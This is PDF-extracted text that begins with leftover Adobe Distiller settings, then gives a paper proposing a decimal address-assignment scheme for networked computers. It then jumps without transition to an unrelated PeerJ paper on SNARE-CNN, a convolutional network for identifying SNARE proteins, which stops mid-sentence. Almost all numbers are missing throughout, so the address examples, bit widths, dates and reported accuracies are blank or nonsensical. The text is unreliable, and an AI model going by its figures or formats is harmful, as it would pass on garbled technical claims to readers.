false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , a full decimal method of address assignment for networked computer zhan xin department of information technology xi’an medical university xi’an, china e-mail: @qq.com xie jianping . chinese decimal network working group . shanghai decimal system network information technology ltd. e-mail: @ .cn jin liming . chinese decimal network working group . shanghai decimal system network information technology ltd. e-mail: jlm @ .com lai jiawen . chinese decimal network working group . shanghai decimal system network information technology ltd. e-mail: @ .com abstract—the full decimal method of address assignment for networked computers and intelligent terminals which input into the computer through various input devices of the computer and intelligent terminals is realized, and then, the external address of networked computer and intelligent media stored in the database and the internal arithmetic address are created correspondingly through a variety of transmission media by combination of different computer hardware and software. the new address assignment method can provide sufficient address space for development of internet in the future, and it also provides enough address for application of various personal information household appliances and logistics in electronic commerce and other entities and personal communication terminals while ensuring multiple levels of address structure. this paper mainly introduces the decimal address allocation algorithm and address format, which provides a solid foundation for the next generation internet architecture design. keyword-decimal; future network; ipv ; address assignment i. introduction with the rapid development of science and technology, the world has entered an information age of data communication. the most famous data network is the internet, which can be seen all over the world. in , in order to develop a computer network capable of resisting nuclear attacks, the us department of defense funded the establishment of a packet-switched network named arpanet, which was the earliest prototype of today's internet and was regarded as the forerunner of the information superhighway. nowadays, almost all the countries and regions have joined the internet. china has also established a number of international exports connected to the world's largest internet and achieved rapid increase in user terminals. every single computer connected to the internet shall be provided with one and unique address so that the information can be correctly transmitted to the destination through the internet. at the present, there are three methods for address preparation in and out of doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , china: first, the “ip address”, which is composed of four segment of numbers separated by decimal points; second, the “domain name”, which is generally composed of five character strings (subdomains); and third, the “chinese domain system”, which is composed of three levels of domain names separated by decimal points and slashes. although the above address system guarantees each computer a unique address, it is with the unfavorable disadvantages of complex and not uniform, and is difficult to remember and input. at present, the addressing scheme used in the internet is still based on the original ipv protocol, which uses four segments of -bit decimal numerals to allocate the addresses of hosts and other devices connected to the internet. in the meantime, the addresses are marked by the method of “dotted decimal notation”. although those addresses seem to meet the needs of the entire world in the early stage of internet development and ipv made incredible success, in the last two decades in the th century, internet ushered rapid development all over the world and the number of hosts connected to the internet have been doubled every year, therefore, current amount of addresses can no longer meet such development momentum. what’s more, addresses have been more and more extensively applied in logistics code in e-commerce, space code, identity code, digital currency and three-dimensional geographical code and other intelligent terminals, the existing address assignment techniques fail to meet the needs of social development. it is of vital significance to develop an address identification method that can meet activities of human for several years. ii. decimal address assignment algorithm the algorithm in this study can provide a new address assignment method that offers sufficient address space for development of internet in the future, and provides enough address for application of various personal information household appliances and logistics in electronic commerce and other personal communication terminals in a simpler, more convenient way under a lower cost while ensuring multiple levels of the address structure. the method by which address assignment of a networked computer by full-digital codes is with the following characteristics: the foresaid network access number refers to the stipulated numeral number of the website established in accordance with the national and regional regulations; the foresaid telephone number consists of international direct distance dialing codes of the country of the telephone user, area code for domestic direct dialing of the user and the telephone number of the organization where the user works or the user’s personal telephone number; the classification number is the numeric number preceded by the country or the area for unified classified business categories. the technical scheme is: a full decimal method of address assignment for networked computers and intelligent terminals that is characterized with, address inputting into the computer through input devices of networked computers and intelligent terminals, such as keyboard, bar code, two-dimensional code input device, visual input device and voice input device, and corresponding preparation of external address of networked computer and intelligent media stored in the database and the internal arithmetic address by combination of various computer hardware and software via a variety of transmission media. the address assignment is conducted by the following steps: ) external addresses of all networked computers and intelligent terminals are localized at decimal numbers with the representing range of all decimal integers from to , address are input into the computers via input ports of networked computers and intelligent terminals such as keyboard, voice input device etc.; ) internal address of all networked computers and intelligent terminals are localized at binary numbers international journal of advanced network, monitoring and controls volume , no. , with the representing range of all decimal numbers from to ; ) the addresses can either be corresponded to the binary internal addresses either by the method through which address is with fixed length but variable location or address is with fixed location but variable length; ) in addition to the external addresses, the above mentioned database also stores the original domain names applied in the form of numbers, english and chinese and other different languages, as well as communication numbers such as the existing telephone numbers, area numbers, city numbers, mobile phone numbers, mac address, and the latest digital domain names based on decimal coding; ) the address in the database is directly corresponding to the binary internal address of the computer, and data flow is pointed to the host via computer hardware and software, for instance, the gateway through optical cable through microwave and coaxial cable and other transmission media; the decimal address for character domain name can be found after being resolved through a domain name resolver and pointed to the address of the host, the telephone number; by pointing to the gateway, the mobile phone number and other communication numbers are directly indicated in the communication system to which the communication number is belong. iii. address format and algorithm in all the address assignment methods for networked computers and other intelligent terminals mentioned above, the entire external addresses is evenly divided into domains, domains, domains or domains and each domain address is with the numerical range of the decimal integers from to , to , to or to . in a corresponding way, the internal address is also evenly divided into domains, domains, domains or domains and each domain address is with the numerical range of the binary numbers from to , to , to or to . each domain address must be separated from each other by a separator. if there is a contiguous all-zero domain within the foresaid address or the internal address, a pair of braces or square brackets can be used to replace the all-zero domain. if there are more than one contiguous all-zero domain in the address or internal binary address, each contiguous all- domain may be replaced by a pair of braces or square brackets, and a arabic numeral are used to mark the specific amount of all-zero domains in the segment of domain within the brackets. when there is a continuous segment of arabic numerals found in the foresaid address or one domain of the internal binary address, the segment of arabic numerals can be replaced by a pair of round brackets and the omitted numerals, the amount of connectors and omissions shall be clearly marked from the left to the right within the round brackets. in addition, an external address is an address with a multilevel structure, which can be the interface of a single network, namely a unicast address. the unicast address structure is with the following three levels. ) public topology layer: a collection of network providers and network switching equipment for public internet switching service. the public topology layer consists of a address prefix, top-level aggregation identifier, reserved domain, and second-level aggregation identifier. ) station topology layer: a specific local station or organization that not provides public internet switching service outside the station. it is composed of a station-level aggregation identifier. ) network interface identifier: it is a network interface used for identifying the link. besides, the foresaid second-level aggregation identifier can be further divided into internal multilevel hierarchical international journal of advanced network, monitoring and controls volume , no. , structures and the foresaid station-level aggregation identifier can be used to establish its internal addressing structure and identification sub-network, the foresaid network interface identifier can be used in several interfaces at the same node. in many cases, communication between network nodes is limited to a relatively independent region; there is no need for global aggregation of unicast address. but it is necessary to provide a address specially used for local communication, namely, local unicast address, which can be applied in communication between nodes at the same link and generating the unicast address of the local link with the structure of address format prefix and network interface identifier and a zero in the middle. the local unicast address can also be applied in addressing of the communication internet interface within the range of the station and generating the unicast address in station with the structure of a format prefix, sub-network identifier and network interface identifier, together with a between the format prefix and sub-network identifier. the address coding method in this study also defines some addresses for special purposes. for example, the address composed of all zeros belongs to a unspecified address and cannot be assigned to any node, which means that the network interface has not obtained a formal address for the time being. in addition, some addresses can be assigned to more than one network interfaces at the same time, and generate a cluster address with the same structure of that of the unicast address. the address can also be assigned to a multicast address, and the address message with the destination of a multicast address would be received simultaneously by all the network interfaces provided with the multicast address. the technical scheme adopting the above address assignment method provides sufficient address space for the development of the internet in the future, realizes simpler address representation, convenient use and more standardized address assignment. meanwhile, the technical scheme has given full consideration to the size of routing table of the existing router and the current computing power of the computer. the way to internet access with the address prepared by the above coding method is characterized with: successful access to email or the internet realized after inputting the address into the computer modem via a push-button dialing telephone or the computer keyboard and linking into corresponding digital code, which is translated into a ip address or chinese domain name system, all full-digital coded address is corresponding to an existing ip address or chinese domain name system. iv. assignment examples the specific address assignment algorithm is fully explained by the following examples: a. example i through this algorithm, external address of networked computers and intelligent media stored in the database and the internal arithmetic address are created correspondingly. we can evenly divide the entire external address into domains with each address of a decimal integer from - and square brackets are used to separate all the domains. thus, the address is in the format of y]y]y]y]y]y]y]y], in which, every y represents a domain address in the form of a -bit decimal number. the entire internal address is also divided into domains with each address of a binary number from - in the format of x]x]x]x]x]x]x]x], in which, every x represents a domain address in the form of a -bit binary number. for instance: ] ] ] ] ] international journal of advanced network, monitoring and controls volume , no. , ] in this address, the multiple continuous zeros at the left part of each decimal number can be omitted but the all-zero decimal numbers shall be represented at least by a zero. thus, the above address can be written as: ] ] ] ] ] ] ] for further simplifying the address presentation, the continuous zeros in the address can be replaced by a pair of “[ ]”. for instance, the above address can be further simplified as: [ ] ] ] for another instance: ] ] ] ] ] ] ] can be abbreviated as [ ] or[ ] ] ] ] ] ] ] ] can be abbreviated as [ ] or [ ] it should be noted that in abbreviation of the above addresses, you can only use "[]" once to represent a contiguous all-zero field, because multiple uses of [] can result in ambiguous addresses. for instance, address ] ] ] ] ] ] ] can be abbreviated as: [ ] ] ][ ]or[ ] ] ][ ], also ] ] ] ] ][ ]. but not [ ] ] ][ ], otherwise, the number of all-zero fields of the left and right part of the address may be confusing during restoration of the address and then result in ambiguous addresses. besides, for the purpose of further simplification of the address, if there is a continuous sequence of the same arabic numeral in a address domain, such sequence can be replaced by a pair of round brackets, and the omitted numerals, the number of separators and omissions shall be clearly marked from the left to the right in the brackets. for instance: ] ] ] ] ] ] ] ] can be abbreviated as [ ] ( / )] ( / )] ( / ) [ ] in the process of address preparation of networked computers and intelligent terminals, the external address must be corresponding with the internal binary address. for such purpose, the method by which address with fixed length and variable location is adopted to make the two corresponding with each other in this example. for instance, the external address [ ] will be corresponding to the internal binary address [ ]( / ) , and the address [ ] will be corresponding to [ ]( / ) . the address prepared by the method mentioned above can be assigned to network interfaces, and if assigned to single network interface, the identifier is then regarded as a unicast address, and message with the destination of a unicast address will be delivered to the only network interface identified by itself. unicast address is with the same good flexibility as that of the multilevel network structure, which is good for solving the difficult problem of router addressing. for instance, a w aggregation global unicast address is provided with three layers, namely the public topology layer, station topology layer and network interface identifier, in which, the public topology layer is consisted of a address prefix (fp), top-level aggregation level(fla), reserved domain (res) and second-level aggregation identifier (nla), the station topology layer is consisted of station-level aggregation identifier, and the foresaid network interface identifier is merely consisted of network interface identifier. the specific structure is as shown in table in the following: international journal of advanced network, monitoring and controls volume , no. , table i. structural table of global unicast address fp( bits) tla identifier ( bits) res( bits) nla identifier ( bits) sla identifier ( bits) network interface identifier ( bits) public topology layer station-level topology layer network interface identifier for instance, the fp of an address is , tla identifier is , res is , nla identifier is , sla identifier is , and the network interface identifier is , then, the entire address is identified by ( / ) ]( / ) ( / )] ( / ) ]( / ) ][ ]. in such address, by the format prefix routing system, it is easy to tell whether the address is a unicast or other type of address. the top-level aggregation identifier is the highest level at the routing hierarchy, and in case of missing of a router, every top-level aggregation identifier shall be provided with a corresponding item in the routing table together with the routing information of provided with top-level aggregation identifiers shall employ second-level aggregation identifiers in establishment of addressing hierarchical structure and identification of internal stations in the process of internal addressing. and any organization is free to select the assignment plan according to their own needs in allocation of their second-level aggregation identifiers so as to establish their own internal addressing hierarchy. establishment of a hierarchical structure is conducive to aggregation of routers at all levels to be greater extent, and realization of a smaller size of the routing table. a structure can be established as shown in table . table ii. hierarchical structure n l a station identifier station-level aggregation identifiers are used for recognition of establishment of internal addressing hierarchical structure and identification of sub-network number by some organizations (stations). the structure can be shown in table in the following. table iii. structure of station-level aggregation identifiers s l a sub-network number in which, the amount of the hierarchies in the station-level aggregation identifier field and the length of sla identifier at all levels shall be decided by the organizations themselves according to the topology layer structure of their internal sub-network. for a global unicast address prepared and assigned by the above method; address preparation of a station itself is relatively independent of that of the internet. if a station needs to be readdressed, among all the addresses within the station, only the two parts, namely the top-level aggregation identifiers and second-level aggregation identifiers (public topology layer) need certain modifications and the station-level aggregation identifiers and network interface identifiers can remain the same. with such assignment approach, great convenience is brought to management and allocation of internet network addresses. b. example ii in this example, unified address assignment for various computers and intelligent terminals are basically conducted by the same steps as in example i, but corresponding preparation of external address and internal address can be conducted by way of address with fixed location and variable length. by this method, a variety of external addresses of all computers and intelligent terminals are localized at decimal numbers with the representing range of all decimal integers international journal of advanced network, monitoring and controls volume , no. , between and ; and internal addresses of all computers and intelligent terminals are localized at binary numbers with the representing range of all binary numbers from to . and then a method by address with fixed location and variable length can be adopted to correspond the external addresses with binary internal addresses. to be specific, every bit of the decimal number of the external address are corresponding to bits of binary numbers of the internal address of the computer. for instance, external address of [ ] ] ] ] ] ] ] ] ] ] can be corresponding to the binary internal address of [ ] ] ] l] l] ] ] ] ] ]. in this example, every bit of the decimal number of the address is corresponding to bits of binary numbers of the internal address. in the technical scheme employed in example i and example ii, external address and binary internal address can be evenly divided into domains, domains or domains, and the above mentioned address can be assigned to more than one network interfaces at the same time to foster a cluster address with the same structure of that of unicast address. besides, the foresaid address can also be assigned to multicast address. message with the destination of multicast address can be received simultaneously by all the network interfaces provided with the multicast address. the address coding method in example i and example ii above also defines some addresses for special purposes. for example, the address composed of all zeros belongs to a unspecified address and cannot be assigned to any node, which means that the network interface has not obtained a formal address for the time being. if the address is all one, namely the local loopback address, it is expected to loop back the message to itself at a certain node. the local loopback address is usually used when a test is conducted to see whether a protocol stack works properly. v. assignment algorithm interpretation the method by which address assignment of a networked computer by full-digital codes, including full-digital coded address consisted of network access number, telephone number and classification number. the above mentioned network access number refers to the stipulated numeral number of the website established in accordance with the national and regional regulations, for example, the network access number of “shanghai hotline” in shanghai, china is “ ”; the foresaid telephone number consists of the international direct distance dialing codes of the country of the telephone user, the area code for domestic direct dialing of the user and the telephone number of the organization where the user works or the user’s personal telephone number, for example, the telephone number is , in which, is the international distance dialing code in china, is the area code of shanghai, and is the user's phone number, the three parts jointly serve as "telephone number" in the code. this is the key reason why this research adopts the full-digital character code address assignment -- it is simple, easy to remember and would never be duplicated. the classification number is numeric number preceded by the country or the area for unified classified business categories. such digital numbers can be established according to the regulations of the country, area or website of the user, and can either be specified at the main category or subcategory level. since not all access is to be done with subcategories. therefore, in general, those numbers are only specified at a main category level. in such case, digital number of the subcategories can be led after the category number by way of option. in actual use, if customers want to encrypt their addresses, the confidential digital numbers can be led after network access number or telephone number, which can be provided by customers themselves and registered in the address preparation organizations. in the process of use, international journal of advanced network, monitoring and controls volume , no. , customers can choose telephone number dialing or input all the correct digital numbers in a continuous way via computer keyboard and surf the internet after successful connection, which is convenient and efficient. given that many users surf the internet only to send and receive e-mails, and only even apply for a work email, internet service providers shall establish an email for the user which is usually named with three parts of a user name, email server and “@”and indicated by character strings when users apply for an internet account. for easy and unified input, email addresses can be prepared by full-digital coding, and consist of digital number of the user name and the digital number of the domain name of the email server which the email is belongs to. when the above coding method is adopted in email access and browsing the internet, you can use the push-button dialing telephone or the computer keyboard to input its computer modem, and link the corresponding digital code, and then, through the translation software conversion, you can get access to the email or browse the internet. for the purpose of universal use, it is necessary to build a converter which correspond the digital address of the technology in this study with the domain name and ip address of the existing internet. the converter is composed of translation software. only by designating a full-digital coded address, it can be converted to the corresponding ip address, domain name or chinese domain name system, and each full-digital coded address is corresponding to an existing ip address, domain name or chinese domain name system. since computers could only identify ip address, in this study, it is not only necessary to build a converter to converting full-digital coded address into universal domain name and ip address, but also to designate a server to translate the numeric address established through the technology in this study into ip address so that the computer can identify the address for operation. vi. conclusion the methods designed in this study could not only assign a fixed static address to each networked computer but also allocate a dynamic address to a temporarily networked computer, thus, it is easy for users to apply the digital address. besides, the auxiliary information database is established, with which, the full-digital coded address established through the technology in the study and the existing addresses with internet access, including: domain name, ip address and chinese domain system etc. are listed and corresponding with each other, and users can inquire the address with internet access they need just by opening the database installed in the website. thus, it is easy for users to choose different ways to access the internet by inputting. the database could also be complied into a written document for users to look up and consult. references [ ] xie jianping etc.a method of assigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks.rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] xie jianping, xu dongmei, etc. digital domain name specification.sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] wang wenfeng, xie jianping, etc. product and service digital identification format for information procession. sj/t - , . . submitted november accepted february published february corresponding author nguyen quoc khanh le, khanhle@ntu.edu.sg, khanhlee @gmail.com academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright le and nguyen distributed under creative commons cc-by . open access snare-cnn: a d convolutional neural network architecture to identify snare proteins from high-throughput sequencing data nguyen quoc khanh le and van-nui nguyen school of humanities, nanyang technological university, singapore university of information and communication technology, thai nguyen university, thai nguyen, vietnam abstract deep learning has been increasingly and widely used to solve numerous problems in various fields with state-of-the-art performance. it can also be applied in bioinformatics to reduce the requirement for feature extraction and reach high performance. this study attempts to use deep learning to predict snare proteins, which is one of the most vital molecular functions in life science. a functional loss of snare proteins has been implicated in a variety of human diseases (e.g., neurodegenerative, mental illness, cancer, and so on). therefore, creating a precise model to identify their functions is a crucial problem for understanding these diseases, and designing the drug targets. our snare-cnn model which uses two-dimensional convolutional neural networks and position-specific scoring matrix profiles could identify snare proteins with achieved sensitivity of . %, specificity of . %, accuracy of . %, and mcc of . in cross- validation dataset. we also evaluate the performance of our model via an independent dataset and the result shows that we are able to solve the overfitting problem. compared with other state-of-the-art methods, this approach achieved significant improvement in all of the metrics. throughout the proposed study, we provide an effective model for identifying snare proteins and a basis for further research that can apply deep learning in bioinformatics, especially in protein function prediction. snare-cnn are freely available at https://github.com/khanhlee/snare-cnn. subjects bioinformatics, computational biology, data mining and machine learning keywords position specific scoring matrix, snare protein function, deep learning, membrane fusion, vesicular transport protein, cancer, human disease, biological domain, overfitting, protein family classification introduction deep learning is an advanced machine learning and artificial intelligent technique to learn the representative data with multiple layers of neural networks (lecun, bengio & hinton, ). numerous difficult problems have been solved with deep learning, e.g., speech recognition, visual object recognition, object detection. the advantages of deep learning are: ( ) significantly outperforms other solutions in multiple domains, ( ) reduces the requirement for feature extraction and time consumption with the use of graphic processing units (gpus), and ( ) easily adapts to a new problem. deep neural network how to cite this article le nqk, nguyen v-n. . snare-cnn: a d convolutional neural network architecture to identify snare proteins from high-throughput sequencing data. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:khanhle@ntu.edu.sg mailto:khanhlee @gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/khanhlee/snare-cnn http://doi.org/ . /peerj-cs. models often achieve better performance compared to shallow networks, especially in most of problems with big data. therefore, deep learning becomes popular and attracts numerous huge companies establishing their directions in this field in recent years. nowadays, much progress towards deep learning has been made using different deep neural network architectures. a number of studies showed that using deep learning can enhance results in various fields, e.g., prediction of cervical cancer diagnosis (fernandes et al., ), pirna (wang, hoeksema & liang, ), and isolated guitar transcription (burlet & hindle, ). hence, deep learning is also a fascinating trend in bioinformatics and computational biology research. this study attempts to present a framework to apply deep learning in bioinformatics by using two-dimensional convolutional neural network ( d cnn), which is one popular type of deep neural networks. we anticipate our method will lead to a significant improvement when compared to traditional machine learning techniques in the bioinformatics field. in earlier years, researchers used shallow neural networks for solving a number of problems in bioinformatics and computational biology. for example, ou constructed quickrbf package (oyang et al., ) for training radial basis function (rbf) networks and applied them on several bioinformatics problems including classifying electron transport proteins (le, nguyen & ou, ), transporters (le, sandag & ou, ), and binding sites (le & ou, a; le & ou, b). chang & lin ( ) introduced libsvm to help biologists implement bioinformatics models by using support vector machines. recently, as deep learning has been successfully applied in various fields, researchers started to use it in bioinformatics problems, e.g., prediction of pirna (wang, hoeksema & liang, ) and ab initio protein secondary structure (spencer, eickholt & cheng, ). although those studies achieved very good performances, we believe that we can obtain superior results by using d cnn in some bioinformatics applications. in this study, we applied our architecture in the prediction of snare proteins, which is one of the most vital molecules in the life sciences. snare is an evolutionary superfamily of small proteins that have a conservation pattern of – amino acids (snap motifs) in their cytoplasmic domain. snare proteins catalyze cell membrane integration in eukaryotes and are essential for a wide range of cellular processes, including cell growth, cytokinesis, and synaptic transmission (jahn & scheller, ; wickner & schekman, ). most snares contain only one snare motif adjacent to a single c-terminal membrane (e.g., synaptobrevin and syntaxin ). some snares contain two snare motifs that are connected by a long linkage and non-transmembrane sequence (e.g., snap- ) but are attached to the membrane through a post-translational modification such as palmitoylation. various types of snare proteins now identified and several studies demonstrated that a functional loss of snare proteins has been implicated in numerous diseases (e.g., neurodegenerative (hou et al., ), mental illness (honer et al., ), cancer (meng & wang, ; sun et al., ), and so on). therefore, snare proteins play an important function in the cell and there is a need to develop some bioinformatics techniques to identify them. because of the essential role in human diseases, snare proteins attracted various researchers who conducted their research on them. for instance, kloepper team attempted le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to build a database to store and classify snare proteins (kienle, kloepper & fasshauer, ; kloepper, kienle & fasshauer, ; kloepper, kienle & fasshauer, ). next, van dijk et al. ( ) built a framework to predict functions of snares in sub-golgi localization. moreover, weimbs et al. ( ) used bioinformatics techniques to analyze conserved domains in snare. yoshizawa et al. ( ) extracted sequence motifs and the phylogenetic features of snare-dependent membrane trafficking. shi et al. ( ) directed targeting of membrane fusion by snare mimicry by convergent evolution of legionella effectors. lu ( ) analyzed the destructive effect of botulinum neurotoxins on the snare protein and proposed that the truncated snap- mutants will disrupt the assembly of the snare core complex, and then inhibit the synaptic membrane fusion accordingly. most published works on snare proteins achieved high performance, but to our knowledge, no researcher conducted the prediction of snare proteins using machine learning techniques. it is challenging and motivates us to create a precise model for this. besides that, we also applied deep learning in this problem, which is a modern technique for classification and obtain high accuracies in various fields. based on the advantages of deep learning, this study consequently proposes the use of a d convolutional neural network (cnn) constructed from position-specific scoring matrix (pssm) profiles to identify snare proteins. the basic principle has already been successfully applied to identify electron transporting proteins (le, ho & ou, ) and rab gtpases (le, ho & ou, ). thus, in this paper, we extend this approach to identify the molecular functions of snare proteins. the main achievements, including contributions to the field, are presented as follows: (i) development of a deep learning framework to identify snare functions from protein sequences, in which our model exhibited a significant improvement beyond traditional machine learning algorithms; (ii) first computational study to identify snare proteins and provide useful information to biologists to discover the snare molecular functions; (iii) valid benchmark dataset to train and test snare proteins with high accuracy, which forms a basis for future research on snare proteins. as shown in a series of recent publications (chen et al., ; cheng, xiao & chou, a; cheng, xiao & chou, b; chou, cheng & xiao, ; feng et al., ; jia et al., ; khan et al., ; xiao et al., b), to develop a really useful statistical predictor for a biological system, one should observe the guidelines of chou’s -step rule (chou, ) to make the following five steps very clear: (i) how to construct or select a valid benchmark dataset to train and test the predictor; (ii) how to formulate the statistical samples with an effective mathematical expression that can truly reflect their intrinsic correlation with the target to be predicted; (iii) how to introduce or develop a powerful algorithm (or engine) to operate the prediction; (iv) how to properly perform cross-validation tests to objectively evaluate the anticipated accuracy of the predictor; (v) how to provide source code and dataset that are accessible to the public. below, we are to describe how to deal with these steps one-by-one. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flowchart for identifying snare proteins using two-dimensional convolutional neural net- works. full-size doi: . /peerjcs. /fig- materials & methods we implemented an efficient framework for identifying snare proteins by using a d cnn and pssm profiles. the framework consists of four procedures: data collection, feature extraction, cnn generation, and model evaluation. figure presents the flowchart of our framework, and its details are described as follows. dataset the dataset was retrieved from the uniprot database (by - - ) (uniprot consortium, ), which is one of the comprehensive resources for the protein sequence. first of all, we collected all snares proteins from the uniprot annotation (by using keyword ‘‘snare’’). note that only reviewed proteins (records with information extracted from literature and curator-evaluated computational analysis) were collected. subsequently, blast (altschul et al., ) was applied to remove the redundant sequences with similarity more than %. however, after this process, the rest of proteins only reached snares, and the number of data points was insufficient for a precise deep learning model. hence, we used a cut-off level of % in the cross-validation dataset for more data to create a significant model. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table statistics of all retrieved snare and non-snare proteins. cross-validation independent snare non-snare , we still used similarity of % in the independent dataset to evaluate the performance of the model. this step is a very important step to check if the model was overfitting or not. the proposed problem was the binary classification between snare proteins and general proteins, thus we collected a set of general proteins as negative data. in order to create a precise model, there is a need to collect negative dataset which has a similar function and structure with the positive dataset. from that, it is challenging to build a precise model but it increases our contribution to the predictor. it will also help us decrease the number of negative data collected. after considering the structure and function, we chose vesicular transport protein, which is a general protein including snare protein. we counted it as negative data to perform the classification problem. we removed the redundant data between two datasets as well as the sequences with similarity more than %. finally, there were snare proteins and non-snare proteins used. we then divided data into cross-validation and independent dataset. the detail of the dataset using in this study is listed in table . encoding feature sets from the protein sequence information in order to convert the protein sequence information into feature sets, we applied the pssm matrices for fasta sequences. a pssm profile is a matrix represented by all motifs in biological sequences in general and in protein sequences in particular. it is created by rendering two sequences having similar structures with different amino acid compositions. therefore, pssm profiles have been adopted and used in a number of bioinformatics problems, e.g., prediction of protein secondary structure (jones, ), protein disorder (shimizu, hirose & noguchi, ), and transport protein (ou, chen & gromiha, ) with significant improvements. since the retrieved dataset is in fasta format, it needs to be converted into pssm profiles. to perform this task, we used psi-blast (altschul et al., ) to search all the sequence alignments of proteins in the non-redundant (nr) database with two iterations. the query to produce the pssm profile is as follows: psiblast.exe -num_iterations -db <nr>-in_msa <fasta_file>-out_ascii_<pssm_file> the feature extraction part of fig. indicates the information of generating the pssm capabilities from original pssm profiles. each amino acid in the sequence is represented by a vector of values (each row). first, we summed up all rows with the same amino acid to transform the original pssm profiles to pssm profiles with dimensions. the purpose of this step is to force this data type into something easier for the neural network to deal with. each element of the d input vector was then divided by the sequence length and then be scaled before inserting into neural networks. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. input layers for d convolutional neural networks the architecture of our cnn is described in the below part of fig. . the cnn contains three layers: an input layer, hidden layers (including convolutional, pooling and fully connected layers), and an output layer. cnn had been applied in numerous applications in various fields and convinced wonderful results (amidi et al., ; palatnik de sousa, ). in our study, an input of the cnn is a pssm corresponding to the protein sequences. we then propose a method to predict snare proteins by using their pssm profiles as the input data. with this type of dataset, we assumed the pssm profile with × matrix as a grayscale image with × pixels, we can then train the model with two-dimensional cnn. the input pssm profile was then connected to our d cnn in which we set a variety of parameters to improve the performance of the model. by using a d cnn rather than other neural network structures, we aimed to capture as many hidden spatial features as possible in the pssm matrices. this approach guarantees the correctness of the generated features and prevents the disorder problem inside the amino acid sequences. the more hidden layers generated, the more hidden features generated in cnn to identify snare proteins easily. in this work, we used four filter layers (with , , , and filters) and three different kernel sizes in each filter. multiple hidden layers for deep neural networks following the input layer, hidden layers aim to generate matrices to learn the features. we established the hidden layers that contained various sub-layers with different parameters and shapes. those d sub-layers are zero padding, convolutional, max pooling and fully-connected layers with different numbers of filters. all of the layers are combined together to become the nodes in the deep neural networks. the quality of our model was determined by the number of layers and parameters. the first layer of our d cnn architecture is the zero padding d layer, which added zero values at the beginning and the end of × matrices. the shape matrix changed to × 